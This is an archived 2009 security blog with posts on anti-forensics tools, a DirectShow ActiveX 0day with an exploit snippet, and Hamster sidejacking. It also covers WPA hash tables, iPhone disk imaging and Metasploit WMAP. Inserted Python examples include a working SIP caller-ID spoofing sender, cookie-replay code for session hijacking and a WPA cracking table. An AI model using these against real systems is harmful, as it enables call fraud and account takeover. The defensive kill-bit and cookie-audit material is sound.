A new anti-forensics tool, DECAF, has been released this week. Download link: DECAF
"According to the Register, the program deletes temporary files or processes associated with COFEE, erases all COFEE logs, disables USB drives, and contaminates or spoofs a variety of MAC addresses to muddy forensic tracks."
Read the full article:
Hackers Brew Self-Destruct Code to Counter Police Forensics
Tuesday, December 15, 2009
Wednesday, November 11, 2009
Wednesday, October 7, 2009
Ready? ./set
Social Engineer Toolkit:
The Social Engineering Toolkit (SET) is a Python-driven suite of custom tools for social-engineering attacks.
SET has two main methods of attack: one utilizes Metasploit payloads and Java-based attacks by setting up a malicious website that ultimately delivers your payload; the second works through file-format bugs and e-mail phishing.
SET is designed to make complex social engineering tasks relatively simple by giving you a robust framework for penetration tests.
SET works with Metasploit and basically automates mail and website attacks.
Email password leak update
After yesterday's leak of 10,000 Hotmail and Windows Live e-mail passwords and details, it emerged this morning that another list containing 20,000 e-mail addresses and passwords from Hotmail, Yahoo, AOL, Gmail and other service providers has been posted online.
More than 10,028 pairs of user names and passwords were posted to multiple pages of public upload sites like Pastebin.com, some of which remained live at the time of writing. The stash is likely only a small sample of a much larger file.
Wouldn't it be great if this phishing was somehow linked to Mafia Wars or any other FB app? Could it be a phishing attack?
Tuesday, August 25, 2009
Clarification
I would like to clarify the article that was posted yesterday at TheMarker regarding the security breach in the Cellcom website. I didn't do any penetration testing or auditing on the website.
I just got the link and was asked for my professional opinion. As far as I know, the security department knew about the risks this info can lead to. That's all.
M4y th3 S0urce b3 w1th u5.
Audit VoiP++
A great suite for exploring, classifying, and auditing telephone systems can be found in WarVOX.
The suite of tools provides the unique ability to classify all telephone lines in a given range, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders.
WarVOX is intended for legal security assessment, asset inventory, and research purposes only.
Tuesday, July 7, 2009
DirectShow 0day in the wild
The so-called DirectShow 0day is being exploited in the wild at a high rate; the current outbreak began online last week. The flaw is in the Microsoft Video ActiveX control (msvidctl.dll, covered by Microsoft Security Advisory 972890): a malicious web page instantiates the control in Internet Explorer on Windows XP, and the control's handling of the data the page feeds it triggers the bug. The victim does not have to open Windows Media Player; the media handling happens inside the browser.
This is a client side (IE) exploit, so visiting a malicious site will result in infection.
Attack characteristics are as follows:
(I`ve found the code on http://**.****.cn website)
var appllaa='0';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
Microsoft's advisory, published today, offers workarounds for the issue, chief among them setting the kill bit for the ActiveX control.
There is no patch yet; the only fix at the moment is to set the "kill bit" in the registry, which makes Internet Explorer refuse to load the control no matter what a page asks for.
1. Create the following key (save this as a .reg file and import it, or use regedit):
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
2. Or, by hand: create the key above, add a DWORD value named "Compatibility Flags" and give it the value 400 (hex, i.e. 0x00000400).
Restart IE afterwards and check that the value is really there; on 64-bit Windows the same key must also exist under Wow6432Node for the 32-bit IE.
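To check that the workaround actually took, here is an added Python example (mine, not from the advisory or the original post) that generates the .reg text above for any CLSID, checks an exported copy of the ActiveX Compatibility key for the kill bit, and pulls classid references out of a captured page so the CLSID from the attack above can be spotted in other samples. The only fixed values it assumes are the CLSID and the 0x400 flag from the advisory; `reg export` writes UTF-16, so decode the dump with encoding="utf-16" before passing it in.

```python
import re

# CLSID from the attack above (the Microsoft Video ActiveX control) and the
# kill bit value IE honours in "Compatibility Flags".
MSVIDCTL_CLSID = "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"
KILLBIT_FLAG = 0x400
ACTIVEX_COMPAT_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer"
                      r"\ActiveX Compatibility")


def killbit_reg(clsid):
    """Text of a .reg file that sets the kill bit for one CLSID (same shape as above)."""
    return ("Windows Registry Editor Version 5.00\r\n\r\n"
            f"[{ACTIVEX_COMPAT_KEY}\\{{{clsid.upper()}}}]\r\n"
            f'"Compatibility Flags"=dword:{KILLBIT_FLAG:08x}\r\n')


def killbit_set(reg_export, clsid):
    """True if an exported ActiveX Compatibility tree (reg export output for that
    key, decoded as UTF-16 text) carries the 0x400 bit for clsid.
    Other bits in the value are ignored; only the kill bit matters here."""
    key_re = re.compile(r"^\[(.*)\]\s*$")
    flag_re = re.compile(r'^"Compatibility Flags"=dword:([0-9a-fA-F]{8})\s*$')
    in_key = False
    for line in reg_export.splitlines():
        m = key_re.match(line)
        if m:
            # A key line switches context: are we now inside the CLSID's subkey?
            in_key = m.group(1).upper().endswith("{" + clsid.upper() + "}")
            continue
        m = flag_re.match(line)
        if in_key and m:
            return bool(int(m.group(1), 16) & KILLBIT_FLAG)
    return False


def find_classids(html):
    """CLSIDs referenced as classid='clsid:...' in a captured page or script,
    the same attack characteristic quoted above, upper-cased for comparison."""
    pat = re.compile(r"classid\s*=\s*['\"]?clsid:([0-9a-fA-F-]{36})", re.I)
    return [c.upper() for c in pat.findall(html)]
```

On a live box, `reg export "HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility" out.reg` and feed the decoded file to killbit_set; if it returns False the control is still loadable.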
Saturday, June 27, 2009
Let it sn0w
The iPod/iPhone 3G jailbreak is out. The iphone-dev team just released the 24kpwn LLB patch to allow for a persistent jailbreak. The team had been hanging on to this patch because there was the possibility the exploit could be used on future iPhone versions. Unfortunately, a group started selling the code, so the team was forced to release it for free. There is a tutorial available for updating a factory reset iPod/iPhone (backup link).
That means the same sort of technique can be used with the current redsn0w tool to jailbreak and unlock the iPhone 3GS.
Let it ultrasn0w....
Wednesday, June 17, 2009
Tuesday, May 26, 2009
[Sum]mation ILHack
Good morning all! First, I would like to thank Yaniv Miron for organizing such a great conference and inviting me to speak about VoIP Tactics && Exploitation at ILHack 2009.
Next, this one goes to all of my students/friends/colleagues: thanks for the BIG support. You are all in my local subnet ;)
Special 10x to SIPM4ST3R Yossef Cohen for the lab organization, coding, and talking about the SIP protocol as part of the lecture.
The presentation, the video of the lecture and the source code for SIPy and sip00fer will be available in the ILHack download section during this weekend.
Hope to see you all, soon.
Jacky Altal
Wednesday, May 20, 2009
Saturday, May 9, 2009
sip00fer
After a looong week, I've finished my case study on a PBX (Asterisk). A new 1.6.1.0 Asterisk version was installed on CentOS, a great distro, and with the help of the SIP M4ST3R Yossef{at}maxxvoice{dot}com I managed to install and configure my new PBX up and running in a few hours. [./configure; make; make install] simple as that.
Then I started testing my Asterisk box, as I had seen a sample code in the Metasploit framework that can create a fake call to any extension. The code didn't work against a new 1.6.0.5, as Yossef found that the CSeq header is missing, so I decided to implement it myself; I used RFC 3261 to deeply understand the protocol and to expand my research into this fascinating area.
I wrote a POC in Python and then converted it to C++; the POC builds a fake packet and sends it to the SIP client.
The code will be posted soon -> ilHack 2009 <- along with a new SIPcliFuzzer.
Usage: sip00fer [host] [port] [fake_extension] [Fake_Caller]
Example: sip00fer 13.37.7.1 31317 101 jackjack
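As an added example (not the sip00fer source, which goes up on the ILHack site), this Python builds the same kind of spoofed INVITE per RFC 3261, including the CSeq header the Metasploit sample lacked, and refuses to send anything that is missing a mandatory header. The source address 192.0.2.10, the caller user 1337 and the source port 5060 are placeholder assumptions; sending needs a real SIP target you are allowed to test.

```python
import random
import socket
import sys
import uuid

# Mandatory headers for any SIP request (RFC 3261 section 8.1.1), lowercased for lookup.
MANDATORY = ("via", "max-forwards", "to", "from", "call-id", "cseq")


def build_invite(target_host, target_port, extension, caller_name,
                 caller_user="1337", src_host="192.0.2.10", src_port=5060):
    """Build an INVITE to `extension` whose From header shows a spoofed display name.

    src_host/src_port/caller_user are placeholder assumptions: the address the
    spoofing host answers on and whatever user part you want the phone to show.
    """
    branch = "z9hG4bK" + uuid.uuid4().hex[:16]   # RFC 3261 magic cookie prefix
    tag = uuid.uuid4().hex[:8]
    call_id = uuid.uuid4().hex + "@" + src_host
    cseq = random.randint(1, 2**31 - 1)            # the header the Metasploit sample lacked
    lines = [
        f"INVITE sip:{extension}@{target_host}:{target_port} SIP/2.0",
        f"Via: SIP/2.0/UDP {src_host}:{src_port};branch={branch};rport",
        "Max-Forwards: 70",
        f'From: "{caller_name}" <sip:{caller_user}@{src_host}>;tag={tag}',
        f"To: <sip:{extension}@{target_host}>",
        f"Call-ID: {call_id}",
        f"CSeq: {cseq} INVITE",
        f"Contact: <sip:{caller_user}@{src_host}:{src_port}>",
        "Content-Length: 0",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_headers(msg):
    """Return (request line, {lowercased header name: value}).
    Compact header forms (e.g. 'f:' for From) are not expanded here."""
    head = msg.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def missing_headers(msg):
    """Mandatory headers absent from msg; an empty list means it is sendable."""
    _, headers = parse_headers(msg)
    return [h for h in MANDATORY if h not in headers]


def send_invite(msg, target_host, target_port):
    """Send the INVITE over UDP, but only if it is well formed."""
    missing = missing_headers(msg)
    if missing:
        raise ValueError("not sending, missing headers: " + ", ".join(missing))
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(msg.encode(), (target_host, target_port))


if __name__ == "__main__":
    # Same usage as sip00fer: host port fake_extension fake_caller
    host, port, ext, caller = sys.argv[1], int(sys.argv[2]), sys.argv[3], sys.argv[4]
    send_invite(build_invite(host, port, ext, caller), host, port)
```

The phone rings with the spoofed name because nothing in plain UDP SIP authenticates the From header; that is the whole point of the POC, and also why a PBX should not accept INVITEs from unregistered peers.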
Monday, April 27, 2009
Sidejacking
Hamster is a tool for HTTP session hijacking (sidejacking) via passive sniffing. It eavesdrops on the network, captures the session cookies sent in cleartext HTTP requests, then imports them into your browser so you can take over the victim's session without ever seeing a password. It only works for cookies that travel over plain HTTP; a site that serves everything over HTTPS and marks its session cookie Secure gives it nothing to capture.
Download Link
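Added example (my own, not Hamster code) showing what a passive sidejacker actually harvests: it extracts cookies from a constructed sample of plaintext HTTP traffic, builds the replayed request, and flags the cookies that were set without the Secure attribute, which is what makes them sniffable in the first place. The traffic sample and mail.example.com are made up.

```python
import re

# Constructed sample of cleartext HTTP, as seen on a shared network: a response
# setting two cookies, then the victim's next request carrying both of them.
SAMPLE_TRAFFIC = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sid=8f3a9c2e1b; Path=/; HttpOnly\r\n"
    "Set-Cookie: pref=lang%3Den; Path=/; Secure\r\n"
    "Content-Length: 0\r\n\r\n"
    "GET /inbox HTTP/1.1\r\n"
    "Host: mail.example.com\r\n"
    "Cookie: sid=8f3a9c2e1b; pref=lang%3Den\r\n\r\n"
)


def sniffed_cookies(traffic):
    """{name: value} for every cookie seen in a Cookie request header; this is
    what a sidejacker collects, no passwords needed."""
    found = {}
    for m in re.finditer(r"^Cookie:\s*(.+?)\r?$", traffic, re.M):
        for part in m.group(1).split(";"):
            name, _, value = part.strip().partition("=")
            if name:
                found[name] = value
    return found


def hijackable_cookies(traffic):
    """Names of cookies set without the Secure attribute. The browser will send
    those over plain HTTP, so they can be sniffed. HttpOnly does not help here:
    it only blocks script access, not transmission on the wire."""
    weak = []
    for m in re.finditer(r"^Set-Cookie:\s*(.+?)\r?$", traffic, re.M | re.I):
        attrs = [p.strip() for p in m.group(1).split(";")]
        name = attrs[0].partition("=")[0]
        if not any(a.lower() == "secure" for a in attrs[1:]):
            weak.append(name)
    return weak


def replay_request(host, path, cookies):
    """The request a hijacker's browser sends once the stolen cookies are imported."""
    cookie = "; ".join(f"{k}={v}" for k, v in cookies.items())
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nCookie: {cookie}\r\n\r\n"
```

Run hijackable_cookies over your own application's responses: any session cookie it lists is a sidejacking target until the site goes HTTPS-only and sets Secure on it.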
Monday, April 6, 2009
Web (rat)Proxy
"Ratproxy is a semi-automated, largely passive web application security audit tool, optimized for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments."
Download ratproxy from the following link
OR use the following commands:
$> wget http://ratproxy.googlecode.com/files/ratproxy-1.56.tar.gz
$> tar xzvf ratproxy-1.56.tar.gz
$> cd ratproxy
$> make
In Firefox go to Tools > Options > Advanced > Network > Settings, choose manual proxy configuration and point the HTTP proxy at the host running ratproxy (it listens on port 8080 by default; change that with -p). Then execute ratproxy with the following command, where -d restricts the findings to the domain you are allowed to scan:
$> ./ratproxy -w logfile -d domaintoscan -rlextifscpjm
Browse the application through the proxy; ratproxy is passive, so it only sees what you exercise. To get a report as an HTML file use:
$> ./ratproxy-report.sh logfile > report.html
Jacky Altal
WPA Rainbow tables
Offensive Security released a set of coWPAtty WPA hash tables, each one SSID-specific, generated from a 49 million entry WPA-optimised password dictionary. Each table is 1.9 GB. The tables are per SSID because WPA mixes the SSID into the key derivation as the salt, so a precomputed table only helps against networks using that exact SSID.
Anyone can help by seeding these files.
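To see why every table is tied to one SSID: WPA derives the PMK with PBKDF2-HMAC-SHA1, 4096 iterations, using the SSID as the salt. Added Python example (not from Offensive Security or coWPAtty) that computes the PMK and builds a toy per-SSID table from a constructed four-word list; the 49M-entry dictionary is only referred to, not included.

```python
import hashlib


def wpa_pmk(passphrase, ssid):
    """PSK-mode WPA/WPA2 Pairwise Master Key as IEEE 802.11i defines it:
    PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 256-bit output).
    Because the SSID is the salt, a PMK for one SSID is useless against another."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def build_table(ssid, wordlist):
    """Precompute PMK -> passphrase for one SSID. This is what a coWPAtty hash
    file holds, and why each of the published tables covers exactly one SSID."""
    return {wpa_pmk(word, ssid): word for word in wordlist}


def crack(table, pmk):
    """Look a candidate PMK up in the table. Against a real handshake each entry
    is tested by deriving the PTK and checking the EAPOL MIC; the costly PBKDF2
    step is what the table saves."""
    return table.get(pmk)


# Constructed wordlist for the demonstration (the real tables use 49M entries).
WORDLIST = ["password", "letmein", "ilovewifi", "qwerty123"]
```

A table built for "linksys" finds nothing on a network called "IEEE" even with the same passphrase, which is the reason a rare SSID is a cheap defence against these tables and a weak passphrase is still the real problem.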
Infected with Confliker?
The Conficker Test is a simple visual test that anyone can run to evaluate a Windows PC just by browsing to that page. Conficker is known to block access to over 100 anti-virus and security websites, so the page loads images from those blocked security and antivirus websites.
If you are blocked from loading the remote images in the first row of the top table on that page (AV/security sites) but not from loading the remote images in the second row (websites of alternative operating systems), then your Windows PC may be infected by Conficker (or some other malicious software). If both rows fail to load, the problem is your connectivity or a proxy, not Conficker, and the test tells you nothing.
This test was originally developed by Joe Stewart. As you can see it is a simple method that anyone can use.
A link to a Conficker removal tool can be found HERE
Jacky Altal
Thursday, April 2, 2009
Manipulating Client Side Scripts
As you can see in the following link posted by Lament just yesterday, there is a big security flaw in the Ynet forums.
I have read the mails between Yaniv and the Ynet response team, and it seems like they really don't care. I'm not sure if Yaniv did the right thing by posting this video, but no doubt something had to be done.
I have to admit that this particular flaw was known for a while, and to be honest there are many others.....
Attacking SMM Memory via Intel® CPU Cache Poisoning
Attacking SMM Memory via Intel® CPU Cache Poisoning (March 2009) is a research paper by Rafal Wojtczuk and Joanna Rutkowska describing a new attack that compromises the integrity of System Management Mode on Intel-based systems.
PDF
Sunday, March 1, 2009
ilHack \x32\x30\x30\x39
ifis.org.il, the Israeli security forum, and Yaniv Miron (CISO grad) announced the 2009 hacking convention.
Additional information can be found in the following link:
-ilhack 2009 convention 4/5/09
Thursday, February 26, 2009
SQL Queries
Web application attacks are still in the top 10 security threats for 2009. During my work I face DBs that I don't work on on a regular basis, which got me to compile a list of queries for MSSQL, Oracle, MySQL, PostgreSQL and MS Access. In the following xls file you can find the most used SQL injection queries. The list was constructed from data that I picked from several web sites and during the days and nights of /me @work ;)
Tuesday, February 17, 2009
iPhone 2.2 Backup
To make a bit-by-bit copy, use the following method (the phone is jailbroken with SSH access, and 192.168.1.100 is the *nix box that receives the image):
On your *nix box open up netcat, listening and writing everything it receives to the image file:
nc -lvp 1337 | dd of=./imagem.dmg bs=4096
On your iPhone, over SSH, execute the following (rdisk0s2 is the user data partition; the device keeps running while you copy, so do it with as little activity on the phone as possible):
dd if=/dev/rdisk0s2 bs=4096 | netcat 192.168.1.100 1337
When dd on the phone reports it is done, compare a hash of the file with one taken on the device before trusting the image.
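Added example, not part of the original post: a Python stand-in for the `nc | dd` side that writes the image and hashes it as it arrives, so you can compare against a digest taken on the phone instead of hoping no bytes were lost. It assumes the phone pipes the raw partition to TCP port 1337 as in the command above; the `openssl dgst` command mentioned in the comment is an assumption about what is installed on the phone.

```python
import hashlib
import socket


def store_image(stream, out_path, bs=4096):
    """Copy a raw partition stream to out_path, hashing it on the way.

    Returns (bytes_written, sha256_hex). Compare the digest with one taken on the
    phone (for example `openssl dgst -sha256 /dev/rdisk0s2`, if openssl is
    installed there) to confirm nothing was dropped in transit.
    """
    digest = hashlib.sha256()
    total = 0
    with open(out_path, "wb") as out:
        while True:
            chunk = stream.read(bs)
            if not chunk:          # EOF: the phone side closed the connection
                break
            out.write(chunk)
            digest.update(chunk)
            total += len(chunk)
    return total, digest.hexdigest()


def receive_image(out_path, port=1337, bind_host="0.0.0.0", bs=4096):
    """Listen for one connection, like `nc -lvp 1337 | dd of=... bs=4096`."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_host, port))
        srv.listen(1)
        conn, peer = srv.accept()
        print(f"connection from {peer[0]}")
        with conn, conn.makefile("rb") as stream:
            return store_image(stream, out_path, bs)


if __name__ == "__main__":
    size, sha = receive_image("./imagem.dmg")
    print(f"{size} bytes written, sha256 {sha}")
```

The byte count is the second check: it must equal the partition size dd reported on the phone, otherwise the transfer was cut short.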
If you want to browse your iPhone's contents, look in the following directories (all relative to /private/var, which is what rdisk0s2 holds):
Calendar /mobile/Library/Calendar/calendar.sqlitedb
Call history /mobile/Library/CallHistory/call_history.db
Notes /mobile/Library/Notes/notes.db
SMS /mobile/Library/SMS/sms.db
Address book /mobile/Library/AddressBook/AddressBook.sqlitedb
Voicemail /var/root/Library/Voicemail/voicemail.db
Photos /mobile/Media/DCIM/
Photos /mobile/Media/Photos
Google Maps /mobile/Library/Caches/MapTiles/MapTiles.sqlitedb
Cookies /mobile/Library/Cookies/Cookies.plist
iPhone Recorder /private/var/mobile/Media/iPhoneRecorder
Jacky Altal
Advanced Exploitation with Metasploit
I decided to write a post about the new/advanced features in my favorite exploitation framework, Metasploit. The improved tools in the framework include wmap (web application mapping) and autopwn (exactly what it sounds like).
WMAP
"WMAP is a general purpose web application scanning framework for Metasploit 3. The architecture is simple and its simplicity is what makes it powerful. It's a different approach compared to other open source alternatives and commercial scanners, as WMAP is not build around any browser or spider for data capture and manipulation."
STEP 1: load sqlite3 database
>load db_sqlite3
STEP 2: Create new database
>db_create wmapjack.db
STEP 3: Load wmap Database
>load db_wmap
STEP 4: Connect to the database you created in step 2 (the file name must match)
>db_connect wmapjack.db
Now just add the web application target address
>wmap_targets -a http://127.0.0.1
Select it as the current target with the following command (1 is its index in the target list):
>wmap_targets -s 1
Execute the application mapping:
>wmap_run
The active modules are:
wmap_ssl_vhost WMAP_SERVER
frontpage_login WMAP_SERVER
version WMAP_SERVER
wmap_vhost_scanner WMAP_SERVER
wmap_file_same_name_dir WMAP_DIR - this will take a while (bruteforcing directory names)
View the web application report:
>wmap_reports
Test your application
Wednesday, February 11, 2009
BackTrack 4 Beta released
BT4 is the new & improved version, the best so far... another great work by the Remote Exploit team, with some new and exciting features. The most significant change is the expansion from a pentesting LiveCD towards a full-blown "distribution".
DOWNLOAD: BackTrack 4 Beta